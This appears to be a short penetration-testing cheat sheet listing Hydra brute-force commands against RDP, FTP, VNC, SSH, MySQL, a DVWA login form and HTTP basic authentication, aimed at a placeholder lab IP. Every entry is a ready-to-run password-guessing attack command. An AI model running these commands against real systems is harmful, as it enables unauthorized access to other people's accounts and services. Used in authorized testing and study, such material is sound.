Hack$Notes
Search
K

Hydra

Hydra Brute Force

RDP

hydra -t 4 -V -f -l administrator -P rockyou.txt rdp://10.10.10.10
-t: number of tasks run in parallel
-V: verbose
-f: quit once correct credentials found
-l: username
-P: passwords on a file

FTP

hydra -t 5 -V -f -L userlist -P passwordlist ftp://10.10.10.10
-t: number of tasks run in parallel
-V: verbose
-f: quit once correct credentials found
-l: username list
-P: password list

VNC

hydra -P passwordlist -t 1 -w 5 -f -s 5901 10.10.10.10 vnc -v
-s: port to connect to

SSH

hydra -l admin -P passwordlist ssh://10.10.10.10 -V

MySQL

hydra -l root -P /usr/share/wordlists/rockyou.txt 10.10.10.10 mysql -t 4

Web Login

hydra 10.10.10.10 -V -l admin -P passwordlist http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:F=Username and/or password incorrect.:H=Cookie: PHPSESSID=tjflbmwot3dqbj1ph3tmjchel2; security=low"

Basic Authentication

hydra -l username -P /path/to/wordlist -f 10.10.10.10 http-get /directory
hydra -l username -P /path/to/wordlist -f 10.10.10.10 http-get -s 8080
Last modified 2yr ago